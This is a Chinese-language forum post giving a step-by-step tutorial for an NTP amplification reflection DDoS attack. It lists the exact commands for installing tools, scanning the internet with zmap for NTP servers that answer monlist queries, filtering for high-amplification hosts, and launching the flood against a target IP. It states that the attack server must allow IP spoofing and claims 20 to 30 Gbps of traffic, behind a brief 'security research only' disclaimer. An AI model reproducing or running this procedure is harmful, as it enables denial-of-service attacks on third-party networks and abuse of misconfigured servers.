马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有账号?立即注册
x
NTP放大反射DDOS攻击扫描教程,放大列表扫描教程
图上是国外测的 本文实测 能有二三十G
声明:文章中介绍的工具、技术带有一定的攻击性,仅供安全研究,请合理合法使用。!
关于有些服务器不能发起攻击的问题 请自己检查系统 实测脚本没有问题!
注意服务器要支持ip伪造/欺骗
本文使用的服务器系统
centos 6.6 64位
内核 2.6.32-504.el6.x86_64
区分centos6 centos7 执行不同的命令!
Centos 6
- wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
- sudo rpm -Uvh epel-release-6-8.noarch.rpm
复制代码centos 7
- wget http://dl.fedoraproject.org/pub/epel/7/x86_64/Packages/e/epel-release-7-11.noarch.rpm
- sudo rpm -Uvh epel-release-7-11.noarch.rpm
复制代码
安装必要的依赖环境!
- yum -y install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c cpan vnstat zmap
复制代码
上传这里的文件到你的机器!
开始扫描 ntp放大列表
- zmap -p 123 -M udp --probe-args=file:ntp_123_monlist.pkt -o monlist_fingerprint.txt
复制代码扫描时间比较长
扫描完成后
运行 ntp、ntpchecker
首先给它的权限:
- chmod 777 ntp
- chmod 777 ntpchecker
复制代码
运行ntpchecker
- ./ntpchecker monlist_fingerprint.txt step1.txt 1 0 1
复制代码
开始执行过滤!
- awk '$2>419{print $1}' step1.txt | sort -n | uniq | sort -R > ntpamp.txt
复制代码
过滤完成后就可以攻击了
- ./ntp <target IP> <port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>
复制代码
|